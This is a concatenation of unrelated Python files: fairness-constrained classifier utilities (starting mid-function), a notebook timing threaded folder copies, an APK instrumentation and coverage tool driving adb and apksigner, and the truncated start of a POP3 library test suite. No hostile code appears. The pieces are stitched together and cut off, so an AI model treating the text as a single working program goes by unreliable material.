np.random.rand(x.shape[1],), args = (x, y), method = 'SLSQP', options = {"maxiter":max_iter}, constraints = [] ) old_w = deepcopy(w.x) def constraint_gamma_all(w, x, y, initial_loss_arr): gamma_arr = np.ones_like(y) * gamma # set gamma for everyone new_loss = loss_function(w, x, y) old_loss = sum(initial_loss_arr) return ((1.0 + gamma) * old_loss) - new_loss def 
constraint_protected_people(w,x,y): # dont confuse the protected here with the sensitive feature protected/non-protected values -- protected here means that these points should not be misclassified to negative class return np.dot(w, x.T) # if this is positive, the constraint is satisfied def constraint_unprotected_people(w,ind,old_loss,x,y): new_loss = loss_function(w, np.array([x]), np.array(y)) return ((1.0 + gamma) * old_loss) - new_loss constraints = [] predicted_labels = np.sign(np.dot(w.x, x.T)) unconstrained_loss_arr = loss_function(w.x, x, y, return_arr=True) if sep_constraint == True: # separate gemma for different people for i in range(0, len(predicted_labels)): if predicted_labels[i] == 1.0 and x_control[sensitive_attrs[0]][i] == 1.0: # for now we are assuming just one sensitive attr for reverse constraint, later, extend the code to take into account multiple sensitive attrs c = ({'type': 'ineq', 'fun': constraint_protected_people, 'args':(x[i], y[i])}) # this constraint makes sure that these people stay in the positive class even in the modified classifier constraints.append(c) else: c = ({'type': 'ineq', 'fun': constraint_unprotected_people, 'args':(i, unconstrained_loss_arr[i], x[i], y[i])}) constraints.append(c) else: # same gamma for everyone c = ({'type': 'ineq', 'fun': constraint_gamma_all, 'args':(x,y,unconstrained_loss_arr)}) constraints.append(c) def cross_cov_abs_optm_func(weight_vec, x_in, x_control_in_arr): cross_cov = (x_control_in_arr - np.mean(x_control_in_arr)) * np.dot(weight_vec, x_in.T) return float(abs(sum(cross_cov))) / float(x_in.shape[0]) w = minimize(fun = cross_cov_abs_optm_func, x0 = old_w, args = (x, x_control[sensitive_attrs[0]]), method = 'SLSQP', options = {"maxiter":100000}, constraints = constraints ) return w.x def compute_cross_validation_error(x_all, y_all, x_control_all, num_folds, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh_arr, gamma=None): """ Computes the cross validation error for the classifier subject to various fairness constraints This function is just a wrapper of "train_model(...)", all inputs (except for num_folds) are the same. See the specifications of train_model(...) for more info. Returns lists of train/test accuracy (with each list holding values for all folds), the fractions of various sensitive groups in positive class (for train and test sets), and covariance between sensitive feature and distance from decision boundary (again, for both train and test folds). 
""" train_folds = [] test_folds = [] n_samples = len(y_all) train_fold_size = 0.7 # the rest of 0.3 is for testing # split the data into folds for cross-validation for i in range(0,num_folds): perm = range(0,n_samples) # shuffle the data before creating each fold shuffle(perm) x_all_perm = x_all[perm] y_all_perm = y_all[perm] x_control_all_perm = {} for k in x_control_all.keys(): x_control_all_perm[k] = np.array(x_control_all[k])[perm] x_all_train, y_all_train, x_control_all_train, x_all_test, y_all_test, x_control_all_test = split_into_train_test(x_all_perm, y_all_perm, x_control_all_perm, train_fold_size) train_folds.append([x_all_train, y_all_train, x_control_all_train]) test_folds.append([x_all_test, y_all_test, x_control_all_test]) def train_test_single_fold(train_data, test_data, fold_num, output_folds, sensitive_attrs_to_cov_thresh): x_train, y_train, x_control_train = train_data x_test, y_test, x_control_test = test_data w = train_model(x_train, y_train, x_control_train, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh, gamma) train_score, test_score, correct_answers_train, correct_answers_test = check_accuracy(w, x_train, y_train, x_test, y_test, None, None) distances_boundary_test = (np.dot(x_test, w)).tolist() all_class_labels_assigned_test = np.sign(distances_boundary_test) correlation_dict_test = get_correlations(None, None, all_class_labels_assigned_test, x_control_test, sensitive_attrs) cov_dict_test = print_covariance_sensitive_attrs(None, x_test, distances_boundary_test, x_control_test, sensitive_attrs) distances_boundary_train = (np.dot(x_train, w)).tolist() all_class_labels_assigned_train = np.sign(distances_boundary_train) correlation_dict_train = get_correlations(None, None, all_class_labels_assigned_train, x_control_train, sensitive_attrs) cov_dict_train = print_covariance_sensitive_attrs(None, x_train, distances_boundary_train, x_control_train, sensitive_attrs) output_folds.put([fold_num, test_score, train_score, correlation_dict_test, correlation_dict_train, cov_dict_test, cov_dict_train]) return output_folds = Queue() processes = [Process(target=train_test_single_fold, args=(train_folds[x], test_folds[x], x, output_folds, sensitive_attrs_to_cov_thresh_arr[x])) for x in range(num_folds)] # Run processes for p in processes: p.start() # Get the reuslts results = [output_folds.get() for p in processes] for p in processes: p.join() test_acc_arr = [] train_acc_arr = [] correlation_dict_test_arr = [] correlation_dict_train_arr = [] cov_dict_test_arr = [] cov_dict_train_arr = [] results = sorted(results, key = lambda x : x[0]) # sort w.r.t fold num for res in results: fold_num, test_score, train_score, correlation_dict_test, correlation_dict_train, cov_dict_test, cov_dict_train = res test_acc_arr.append(test_score) train_acc_arr.append(train_score) correlation_dict_test_arr.append(correlation_dict_test) correlation_dict_train_arr.append(correlation_dict_train) cov_dict_test_arr.append(cov_dict_test) cov_dict_train_arr.append(cov_dict_train) return test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr def print_classifier_fairness_stats(acc_arr, correlation_dict_arr, cov_dict_arr, s_attr_name): correlation_dict = get_avg_correlation_dict(correlation_dict_arr) non_prot_pos = correlation_dict[s_attr_name][1][1] prot_pos = correlation_dict[s_attr_name][0][1] p_rule = (prot_pos / non_prot_pos) * 100.0 print "Accuracy: %0.2f" % 
(np.mean(acc_arr)) print "Protected/non-protected in +ve class: %0.0f%% / %0.0f%%" % (prot_pos, non_prot_pos) print "P-rule achieved: %0.0f%%" % (p_rule) print "Covariance between sensitive feature and decision from distance boundary : %0.3f" % (np.mean([v[s_attr_name] for v in cov_dict_arr])) print return p_rule def compute_p_rule(x_control, class_labels): """ Compute the p-rule based on Doctrine of disparate impact """ non_prot_all = sum(x_control == 1.0) # non-protected group prot_all = sum(x_control == 0.0) # protected group non_prot_pos = sum(class_labels[x_control == 1.0] == 1.0) # non_protected in positive class prot_pos = sum(class_labels[x_control == 0.0] == 1.0) # protected in positive class frac_non_prot_pos = float(non_prot_pos) / float(non_prot_all) frac_prot_pos = float(prot_pos) / float(prot_all) p_rule = (frac_prot_pos / frac_non_prot_pos) * 100.0 print print "Total data points: %d" % (len(x_control)) print "# non-protected examples: %d" % (non_prot_all) print "# protected examples: %d" % (prot_all) print "Non-protected in positive class: %d (%0.0f%%)" % (non_prot_pos, non_prot_pos * 100.0 / non_prot_all) print "Protected in positive class: %d (%0.0f%%)" % (prot_pos, prot_pos * 100.0 / prot_all) print "P-rule is: %0.0f%%" % ( p_rule ) return p_rule def add_intercept(x): """ Add intercept to the data before linear classification """ m,n = x.shape intercept = np.ones(m).reshape(m, 1) # the constant b return np.concatenate((intercept, x), axis = 1) def check_binary(arr): "give an array of values, see if the values are only 0 and 1" s = sorted(set(arr)) if s[0] == 0 and s[1] == 1: return True else: return False def get_one_hot_encoding(in_arr): """ input: 1-D arr with int vals -- if not int vals, will raise an error output: m (ndarray): one-hot encoded matrix d (dict): also returns a dictionary original_val -> column in encoded matrix """ for k in in_arr: if str(type(k)) != "<type 'numpy.float64'>" and type(k) != int and type(k) != np.int64: print str(type(k)) print "************* ERROR: Input arr does not have integer types" return None in_arr = np.array(in_arr, dtype=int) assert(len(in_arr.shape)==1) # no column, means it was a 1-D arr attr_vals_uniq_sorted = sorted(list(set(in_arr))) num_uniq_vals = len(attr_vals_uniq_sorted) if (num_uniq_vals == 2) and (attr_vals_uniq_sorted[0] == 0 and attr_vals_uniq_sorted[1] == 1): return in_arr, None index_dict = {} # value to the column number for i in range(0,len(attr_vals_uniq_sorted)): val = attr_vals_uniq_sorted[i] index_dict[val] = i out_arr = [] for i in range(0,len(in_arr)): tup = np.zeros(num_uniq_vals) val = in_arr[i] ind = index_dict[val] tup[ind] = 1 # set that value of tuple to 1 out_arr.append(tup) return np.array(out_arr), index_dict def check_accuracy(model, x_train, y_train, x_test, y_test, y_train_predicted, y_test_predicted): """ returns the train/test accuracy of the model we either pass the model (w) else we pass y_predicted """ if model is not None and y_test_predicted is not None: print "Either the model (w) or the predicted labels should be None" raise Exception("Either the model (w) or the predicted labels should be None") if model is not None: y_test_predicted = np.sign(np.dot(x_test, model)) y_train_predicted = np.sign(np.dot(x_train, model)) def get_accuracy(y, Y_predicted): correct_answers = (Y_predicted == y).astype(int) # will have 1 when the prediction and the actual label match accuracy = float(sum(correct_answers)) / float(len(correct_answers)) return accuracy, sum(correct_answers) train_score, 
correct_answers_train = get_accuracy(y_train, y_train_predicted) test_score, correct_answers_test = get_accuracy(y_test, y_test_predicted) return train_score, test_score, correct_answers_train, correct_answers_test def test_sensitive_attr_constraint_cov(model, x_arr, y_arr_dist_boundary, x_control, thresh, verbose): """ The covariance is computed b/w the sensitive attr val and the distance from the boundary If the model is None, we assume that the y_arr_dist_boundary contains the distace from the decision boundary If the model is not None, we just compute a dot product or model and x_arr for the case of SVM, we pass the distace from bounday becase the intercept in internalized for the class and we have compute the distance using the project function this function will return -1 if the constraint specified by thresh parameter is not satifsified otherwise it will reutrn +1 if the return value is >=0, then the constraint is satisfied """ assert(x_arr.shape[0] == x_control.shape[0]) if len(x_control.shape) > 1: # make sure we just have one column in the array assert(x_control.shape[1] == 1) arr = [] if model is None: arr = y_arr_dist_boundary # simply the output labels else: arr = np.dot(model, x_arr.T) # the product with the weight vector -- the sign of this is the output label arr = np.array(arr, dtype=np.float64) cov = np.dot(x_control - np.mean(x_control), arr ) / float(len(x_control)) ans = thresh - abs(cov) # will be <0 if the covariance is greater than thresh -- that is, the condition is not satisfied # ans = thresh - cov # will be <0 if the covariance is greater than thresh -- that is, the condition is not satisfied if verbose is True: print "Covariance is", cov print "Diff is:", ans print return ans def print_covariance_sensitive_attrs(model, x_arr, y_arr_dist_boundary, x_control, sensitive_attrs): """ reutrns the covariance between sensitive features and distance from decision boundary """ arr = [] if model is None: arr = y_arr_dist_boundary # simplt the output labels else: arr = np.dot(model, x_arr.T) # the product with the weight vector -- the sign of this is the output label sensitive_attrs_to_cov_original = {} for attr in sensitive_attrs: attr_arr = x_control[attr] bin_attr = check_binary(attr_arr) # check if the attribute is binary (0/1), or has more than 2 vals if bin_attr == False: # if its a non-binary sensitive feature, then perform one-hot-encoding attr_arr_transformed, index_dict = get_one_hot_encoding(attr_arr) thresh = 0 if bin_attr: cov = thresh - test_sensitive_attr_constraint_cov(None, x_arr, arr, np.array(attr_arr), thresh, False) sensitive_attrs_to_cov_original[attr] = cov else: # sensitive feature has more than 2 categorical values cov_arr = [] sensitive_attrs_to_cov_original[attr] = {} for attr_val, ind in index_dict.items(): t = attr_arr_transformed[:,ind] cov = thresh - test_sensitive_attr_constraint_cov(None, x_arr, arr, t, thresh, False) sensitive_attrs_to_cov_original[attr][attr_val] = cov cov_arr.append(abs(cov)) cov = max(cov_arr) return sensitive_attrs_to_cov_original def get_correlations(model, x_test, y_predicted, x_control_test, sensitive_attrs): """ returns the fraction in positive class for sensitive feature values """ if model is not None: y_predicted = np.sign(np.dot(x_test, model)) y_predicted = np.array(y_predicted) out_dict = {} for attr in sensitive_attrs: attr_val = [] for v in x_control_test[attr]: attr_val.append(v) assert(len(attr_val) == len(y_predicted)) total_per_val = defaultdict(int) attr_to_class_labels_dict = defaultdict(lambda: 
defaultdict(int)) for i in range(0, len(y_predicted)): val = attr_val[i] label = y_predicted[i] # val = attr_val_int_mapping_dict_reversed[val] # change values from intgers to actual names total_per_val[val] += 1 attr_to_class_labels_dict[val][label] += 1 class_labels = set(y_predicted.tolist()) local_dict_1 = {} for k1,v1 in attr_to_class_labels_dict.items(): total_this_val = total_per_val[k1] local_dict_2 = {} for k2 in class_labels: # the order should be the same for printing v2 = v1[k2] f = float(v2) * 100.0 / float(total_this_val) local_dict_2[k2] = f local_dict_1[k1] = local_dict_2 out_dict[attr] = local_dict_1 return out_dict def get_constraint_list_cov(x_train, y_train, x_control_train, sensitive_attrs, sensitive_attrs_to_cov_thresh): """ get the list of constraints to be fed to the minimizer """ constraints = [] for attr in sensitive_attrs: attr_arr = x_control_train[attr] attr_arr_transformed, index_dict = get_one_hot_encoding(attr_arr) if index_dict is None: # binary attribute thresh = sensitive_attrs_to_cov_thresh[attr] c = ({'type': 'ineq', 'fun': test_sensitive_attr_constraint_cov, 'args':(x_train, y_train, attr_arr_transformed,thresh, False)}) constraints.append(c) else: # otherwise, its a categorical attribute, so we need to set the cov thresh for each value separately for attr_val, ind in index_dict.items(): attr_name = attr_val #print attr, attr_name, sensitive_attrs_to_cov_thresh[attr] thresh = sensitive_attrs_to_cov_thresh[attr][attr_name] t = attr_arr_transformed[:,ind] c = ({'type': 'ineq', 'fun': test_sensitive_attr_constraint_cov, 'args':(x_train, y_train, t ,thresh, False)}) constraints.append(c) return constraints def split_into_train_test(x_all, y_all, x_control_all, train_fold_size): split_point = int(round(float(x_all.shape[0]) * train_fold_size)) x_all_train = x_all[:split_point] x_all_test = x_all[split_point:] y_all_train = y_all[:split_point] y_all_test = y_all[split_point:] x_control_all_train = {} x_control_all_test = {} for k in x_control_all.keys(): x_control_all_train[k] = x_control_all[k][:split_point] x_control_all_test[k] = x_control_all[k][split_point:] return x_all_train, y_all_train, x_control_all_train, x_all_test, y_all_test, x_control_all_test def get_avg_correlation_dict(correlation_dict_arr): # make the structure for the correlation dict correlation_dict_avg = {} # print correlation_dict_arr for k,v in correlation_dict_arr[0].items(): correlation_dict_avg[k] = {} for feature_val, feature_dict in v.items(): correlation_dict_avg[k][feature_val] = {} for class_label, frac_class in feature_dict.items(): correlation_dict_avg[k][feature_val][class_label] = [] # populate the correlation dict for correlation_dict in correlation_dict_arr: for k,v in correlation_dict.items(): for feature_val, feature_dict in v.items(): for class_label, frac_class in feature_dict.items(): correlation_dict_avg[k][feature_val][class_label].append(frac_class) # now take the averages for k,v in correlation_dict_avg.items(): for feature_val, feature_dict in v.items(): for class_label, frac_class_arr in feature_dict.items(): correlation_dict_avg[k][feature_val][class_label] = np.mean(frac_class_arr) return correlation_dict_avg def plot_cov_thresh_vs_acc_pos_ratio(x_all, y_all, x_control_all, num_folds, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs): # very the covariance threshold using a range of decreasing multiplicative factors and see the tradeoffs between accuracy and fairness it = 0.05 cov_range = np.arange(1.0, 
0.0-it, -it).tolist() if apply_accuracy_constraint == True: if sep_constraint == False: it = 0.1 cov_range = np.arange(0.0, 1.0 + it, it).tolist() if sep_constraint == True: cov_range = [0,1,5,10,20,50,100,500,1000] positive_class_label = 1 # positive class is +1 train_acc = [] test_acc = [] positive_per_category = defaultdict(list) # for each category (male / female), the frac of positive # first get the original values of covariance in the unconstrained classifier -- these original values are not needed for reverse constraint test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = compute_cross_validation_error(x_all, y_all, x_control_all, num_folds, loss_function, 0, apply_accuracy_constraint, sep_constraint, sensitive_attrs, [{} for i in range(0,num_folds)], 0) for c in cov_range: print "LOG: testing for multiplicative factor: %0.2f" % c sensitive_attrs_to_cov_original_arr_multiplied = [] for sensitive_attrs_to_cov_original in cov_dict_train_arr: sensitive_attrs_to_cov_thresh = deepcopy(sensitive_attrs_to_cov_original) for k in sensitive_attrs_to_cov_thresh.keys(): v = sensitive_attrs_to_cov_thresh[k] if type(v) == type({}): for k1 in v.keys(): v[k1] = v[k1] * c else: sensitive_attrs_to_cov_thresh[k] = v * c sensitive_attrs_to_cov_original_arr_multiplied.append(sensitive_attrs_to_cov_thresh) test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = compute_cross_validation_error(x_all, y_all, x_control_all, num_folds, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_original_arr_multiplied, c) test_acc.append(np.mean(test_acc_arr)) correlation_dict_train = get_avg_correlation_dict(correlation_dict_train_arr) correlation_dict_test = get_avg_correlation_dict(correlation_dict_test_arr) # just plot the correlations for the first sensitive attr, the plotting can be extended for the other values, but as a proof of concept, we will jsut show for one s = sensitive_attrs[0] for k,v in correlation_dict_test[s].items(): if v.get(positive_class_label) is None: positive_per_category[k].append(0.0) else: positive_per_category[k].append(v[positive_class_label]) positive_per_category = dict(positive_per_category) p_rule_arr = (np.array(positive_per_category[0]) / np.array(positive_per_category[1])) * 100.0 ax = plt.subplot(2,1,1) plt.plot(cov_range, positive_per_category[0], "-o" , color="green", label = "Protected") plt.plot(cov_range, positive_per_category[1], "-o", color="blue", label = "Non-protected") ax.set_xlim([min(cov_range), max(cov_range)]) plt.xlabel('Multiplicative loss factor') plt.ylabel('Perc. in positive class') if apply_accuracy_constraint == False: plt.gca().invert_xaxis() plt.xlabel('Multiplicative covariance factor (c)') ax.legend() ax = plt.subplot(2,1,2) plt.scatter(p_rule_arr, test_acc, color="red") ax.set_xlim([min(p_rule_arr), max(max(p_rule_arr), 100)]) plt.xlabel('P% rule') plt.ylabel('Accuracy') plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=0.5) plt.show() def get_line_coordinates(w, x1, x2): y1 = (-w[0] - (w[1] * x1)) / w[2] y2 = (-w[0] - (w[1] * x2)) / w[2] return y1,y2
File Transfer.py
#!/usr/bin/env python
# coding: utf-8

# In[ ]:


import os
import threading
import time
import shutil


# In[ ]:


def copyfunc(src, dst):
    shutil.copytree(src, dst)


# In[ ]:


# Threaded copy: one thread per top-level entry of src, timed end to end.
start = time.time()
src = "E:\\"
dst = "F:\\"
threads = []
for file in os.listdir(src):
    t = threading.Thread(target=copyfunc, args=(src + file, dst + "abcd\\" + file))
    t.start()
    threads.append(t)

for thread in threads:
    thread.join()
end = time.time()
print(end - start)


# In[ ]:


# Single-threaded copy of the same source tree, for comparison.
start = time.time()
copyfunc("E:\\", "F:\\abcde")
end = time.time()
print(end - start)


# In[ ]:


os.listdir('F:\\')


# In[ ]:


import subprocess


# In[ ]:


# Leftover scratch cell: subprocess.run() was called with an empty argument
# list in the original, which raises because no command was given.
# subprocess.run([])
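A sketch under stated assumptions, not part of the original notebook: the same per-directory copy expressed with concurrent.futures.ThreadPoolExecutor, which joins the workers automatically and re-raises any copy error in the caller; the source and destination paths are placeholders.

import os
import shutil
from concurrent.futures import ThreadPoolExecutor


def copy_tree_threaded(src, dst, max_workers=8):
    # One copytree task per top-level entry of src, run on a bounded pool.
    entries = os.listdir(src)
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [
            pool.submit(shutil.copytree,
                        os.path.join(src, name),
                        os.path.join(dst, name))
            for name in entries
        ]
        # result() re-raises any exception from the worker in the caller.
        for f in futures:
            f.result()

# Usage with placeholder paths:
# copy_tree_threaded("E:\\", "F:\\abcd")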
smiler.py
import os import sys import subprocess import re import shutil import threading import signal import logging import time sys.path.extend(['./acvtool/smiler/libs']) from config import config from granularity import Granularity from instrumenting import manifest_instrumenter from libs import Libs from smalitree import SmaliTree from apktool_interface import ApktoolInterface from smali_instrumenter import Instrumenter from utils import timeit from utils import Utils apk_info_pattern = re.compile("package: name='(?P<package>.*?)'") CRASH_REPORT_FILENAME = "errors.txt" def install(new_apk_path): logging.info("installing") cmd = '{} install -r "{}"'.format(config.adb_path, new_apk_path) out = request_pipe(cmd) logging.info(out) def uninstall(package): logging.info("uninstalling") cmd = '{} uninstall "{}"'.format(config.adb_path, package) out = request_pipe(cmd) logging.info(out) def request_pipe(cmd): pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) out, err = pipe.communicate() res = out if not out: res = err if pipe.returncode > 0: raise Exception("----------------------------------------------------\n\ Out: %s\nError: %s" % (out, err)) return res def get_apk_properties(path): info_cmd = "%s dump badging %s" % (config.aapt_path, path) out = request_pipe(info_cmd) matched = re.match(apk_info_pattern, out) package_name = matched.group('package') return apkinfo(package_name, "", "") def get_package_files_list(package_name): cmd = '%s shell ls "/mnt/sdcard/%s/"' % (config.adb_path, package_name) out = request_pipe(cmd) files = [f for f in out.split() if not f.endswith('/')] return files def get_execution_results(package_name, output_dir): result_files = get_package_files_list(package_name) coverage_files = [f for f in result_files if f.endswith(".ec")] crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in result_files else None if not (coverage_files or crash_file): raise Exception("No coverage or crash report files have been detected on the device for {} package.\n\ Run acvtool with \'-start\' argument to produce coverage.".format(package_name)) if os.path.exists(output_dir): shutil.rmtree(output_dir) os.makedirs(output_dir) for f in result_files: adb_pull(package_name, f, output_dir) adb_delete_files(package_name, f) if crash_file: adb_pull(package_name, crash_file, output_dir) adb_delete_files(package_name, crash_file) def adb_pull(package_name, file_path, pull_to): cmd = "%s pull mnt/sdcard/%s/%s %s" % (config.adb_path, package_name, file_path, os.path.abspath(pull_to)) out = request_pipe(cmd) logging.info(out) def adb_delete_files(package_name, file_name): cmd = "%s shell rm mnt/sdcard/%s/%s" % (config.adb_path, package_name, file_name) out = request_pipe(cmd) def grant_storage_permission(package): read_storage_cmd = "{0} shell pm grant {1} android.permission.READ_EXTERNAL_STORAGE".format(config.adb_path, package) subprocess.call(read_storage_cmd, shell=True) write_storage_cmd = "{0} shell pm grant {1} android.permission.WRITE_EXTERNAL_STORAGE".format(config.adb_path, package) subprocess.call(write_storage_cmd, shell=True) def start_instrumenting(package, release_thread=False, onstop=None, timeout=None): grant_storage_permission(package) lock_thread = "" if release_thread else "-w" cmd = '{} shell am instrument -e coverage true {} {}/{}'.format(config.adb_path, lock_thread, package, config.INSTRUMENTING_NAME) if release_thread: os.system(cmd) return out = '' def run(): out = request_pipe(cmd) logging.info(out) original_sigint = 
signal.getsignal(signal.SIGINT) def stop(signum, frame): signal.signal(signal.SIGINT, original_sigint) stop_instrumenting(package, timeout) if onstop: onstop() t = threading.Thread(target=run) t.start() print("Press Ctrl+C to finish ...") signal.signal(signal.SIGINT, stop) def coverage_is_locked(package_name): cmd = "{} shell \"test -e /mnt/sdcard/{}.lock > /dev/null 2>&1 && echo \'1\' || echo \'0\'\"".format(config.adb_path, package_name) logging.debug('Command to check lock file:' + cmd) locked = subprocess.check_output(cmd, shell=True).replace("\n","").replace("\r", "") return locked == '1' def stop_instrumenting(package_name, timeout=None): cmd = "{} shell am broadcast -a 'tool.acv.finishtesting'".format(config.adb_path) logging.info("finish testing") result = subprocess.call(cmd, shell=True) logging.info(result) locked = coverage_is_locked(package_name) if timeout is None: timeout = config.default_onstop_timeout while locked and timeout: logging.info("wait until the coverage file is saved {}".format(package_name)) time.sleep(1) locked = coverage_is_locked(package_name) timeout -= 1 files = get_package_files_list(package_name) coverage_files = [f for f in files if f.endswith(".ec")] crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in files else None logging.info("coverage files at /mnt/sdcard/{0}:".format(package_name)) logging.info("\n".join(coverage_files)) if crash_file: logging.info("crash report /mnt/sdcard/{0}/{1}".format(package_name, crash_file)) @timeit def instrument_apk(apk_path, result_dir, dbg_start=None, dbg_end=None, installation=False, granularity=Granularity.default, mem_stats=None): ''' I assume that the result_dir is empty is checked. ''' apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH, javaOpts = config.APKTOOL_JAVA_OPTS, pathApktool = Libs.APKTOOL_PATH, jarApktool = Libs.APKTOOL_PATH) package = get_apk_properties(apk_path).package unpacked_data_path = decompile_apk(apktool, apk_path, package, result_dir) manifest_path = get_path_to_manifest(unpacked_data_path) logging.info("decompiled {0}".format(package)) instrument_manifest(manifest_path) smali_code_path = get_path_to_smali_code(unpacked_data_path) pickle_path = get_pickle_path(apk_path, result_dir) instrument_smali_code(smali_code_path, pickle_path, package, granularity, dbg_start, dbg_end, mem_stats) logging.info("instrumented") instrumented_package_path = get_path_to_instrumented_package(apk_path, result_dir) remove_if_exits(instrumented_package_path) build_apk(apktool, unpacked_data_path, instrumented_package_path) Utils.rm_tree(unpacked_data_path) logging.info("built") instrumented_apk_path = get_path_to_insrumented_apk(instrumented_package_path, result_dir) sign_align_apk(instrumented_package_path, instrumented_apk_path) logging.info("apk instrumented: {0}".format(instrumented_apk_path)) logging.info("package name: {0}".format(package)) if installation: install(instrumented_apk_path) return (package, instrumented_apk_path, pickle_path) def remove_if_exits(path): if os.path.exists(path): os.remove(path) def build_dir(apktool_dir, result_dir, signature=False, installation=False): apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH, javaOpts = config.APKTOOL_JAVA_OPTS, pathApktool = Libs.APKTOOL_PATH, jarApktool = Libs.APKTOOL_PATH) build_pkg_path = os.path.join(result_dir, "build_temp.apk") build_apk(apktool, apktool_dir, build_pkg_path) package = get_apk_properties(build_pkg_path).package result_apk_path = build_pkg_path if signature: result_apk_path = 
os.path.join(result_dir, "build_{0}.apk".format(package)) sign_align_apk(build_pkg_path, result_apk_path) print('apk was built and signed: {0}'.format(result_apk_path)) else: print('apk was built: {0}'.format(result_apk_path)) if installation: install(result_apk_path) return result_apk_path def decompile_apk(apktool, apk_path, package, result_dir): unpacked_data_path = os.path.join(result_dir, "apktool", package) (run_successful, cmd_output) = apktool.decode(apkPath = apk_path, dirToDecompile = unpacked_data_path, quiet = True, noSrc = False, noRes = False, debug = False, noDebugInfo = False, force = True, #directory exist so without this this process finishes frameworkTag = "", frameworkDir = "", keepBrokenRes = False) if not run_successful: print("Run is not successful!") return unpacked_data_path def get_path_to_manifest(unpacked_data_path): pth = os.path.join(unpacked_data_path, "AndroidManifest.xml") return pth def get_path_to_smali_code(unpacked_data_path): pth = os.path.join(unpacked_data_path, "smali") return pth def get_path_to_instrumentation_metadata_dir(result_dir): pth = os.path.join(result_dir, "metadata") return pth def get_path_to_insrumented_apk(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) new_apk_fname = "{}_{}".format("instr", apk_fname) pth = os.path.join(result_dir, new_apk_fname) return pth def get_path_to_instrumented_package(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) path = os.path.join(result_dir, apk_fname) return path def get_pickle_path(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) metadata_dir = get_path_to_instrumentation_metadata_dir(result_dir) return os.path.join(metadata_dir, "{}.pickle".format(apk_fname[:-4])) def instrument_manifest(manifest_path): manifest_instrumenter.instrumentAndroidManifestFile(manifest_path, addSdCardPermission=True) @timeit def instrument_smali_code(input_smali_dir, pickle_path, package, granularity, dbg_start=None, dbg_end=None, mem_stats=None): smali_tree = SmaliTree(input_smali_dir) smali_instrumenter = Instrumenter(smali_tree, granularity, package, dbg_start, dbg_end, mem_stats) smali_instrumenter.save_instrumented_smali(input_smali_dir) smali_instrumenter.save_pickle(pickle_path) def sign_align_apk(instrumented_package_path, output_apk): aligned_apk_path = instrumented_package_path.replace('.apk', '_signed_tmp.apk') align_cmd = '"{}" -f 4 "{}" "{}"'.format(config.zipalign, instrumented_package_path, aligned_apk_path) request_pipe(align_cmd) apksigner_cmd = '{} sign --ks {} --ks-pass pass:{} --out {} {}'\ .format(config.apksigner_path, config.keystore_path, config.keystore_password, output_apk, aligned_apk_path) request_pipe(apksigner_cmd) os.remove(aligned_apk_path) def build_apk(apktool, apkdata_dir, new_apk_path): apktool.build(srcPath=apkdata_dir, finalApk=new_apk_path, forceAll=True, debug=False) class apkinfo(object): """Properties of the apk file.""" def __init__(self, package=None, sdkversion=None, targetsdkverion=None): self.package = package self.sdkversion = sdkversion self.targetsdkversion = targetsdkverion def __repr__(self): return "%s %s %s" % (self.package, self.sdkversion, self.targetsdkversion)
test_poplib.py
"""Test script for poplib module.""" # Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL # a real test suite import poplib import asyncore import asynchat import socket import os import errno import threading from unittest import TestCase, skipUnless from test import support as test_support HOST = test_support.HOST PORT = 0 SUPPORTS_SSL = False if hasattr(poplib, 'POP3_SSL'): import ssl SUPPORTS_SSL = True CERTFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "keycert3.pem") CAFILE = os.path.join(os.path.dirname(__file__) or os.curdir, "pycacert.pem") requires_ssl = skipUnless(SUPPORTS_SSL, 'SSL not supported') # the dummy data returned by server when LIST and RETR commands are issued LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n' RETR_RESP = b"""From: [email protected]\ \r\nContent-Type: text/plain\r\n\ MIME-Version: 1.0\r\n\ Subject: Dummy\r\n\ \r\n\ line1\r\n\ line2\r\n\ line3\r\n\ .\r\n""" class DummyPOP3Handler(asynchat.async_chat): CAPAS = {'UIDL': [], 'IMPLEMENTATION': ['python-testlib-pop-server']} enable_UTF8 = False def __init__(self, conn): asynchat.async_chat.__init__(self, conn) self.set_terminator(b"\r\n") self.in_buffer = [] self.push('+OK dummy pop3 server ready. <timestamp>') self.tls_active = False self.tls_starting = False def collect_incoming_data(self, data): self.in_buffer.append(data) def found_terminator(self): line = b''.join(self.in_buffer) line = str(line, 'ISO-8859-1') self.in_buffer = [] cmd = line.split(' ')[0].lower() space = line.find(' ') if space != -1: arg = line[space + 1:] else: arg = "" if hasattr(self, 'cmd_' + cmd): method = getattr(self, 'cmd_' + cmd) method(arg) else: self.push('-ERR unrecognized POP3 command "%s".' %cmd) def handle_error(self): raise def push(self, data): asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n') def cmd_echo(self, arg): # sends back the received string (used by the test suite) self.push(arg) def cmd_user(self, arg): if arg != "guido": self.push("-ERR no such user") self.push('+OK password required') def cmd_pass(self, arg): if arg != "python": self.push("-ERR wrong password") self.push('+OK 10 messages') def cmd_stat(self, arg): self.push('+OK 10 100') def cmd_list(self, arg): if arg: 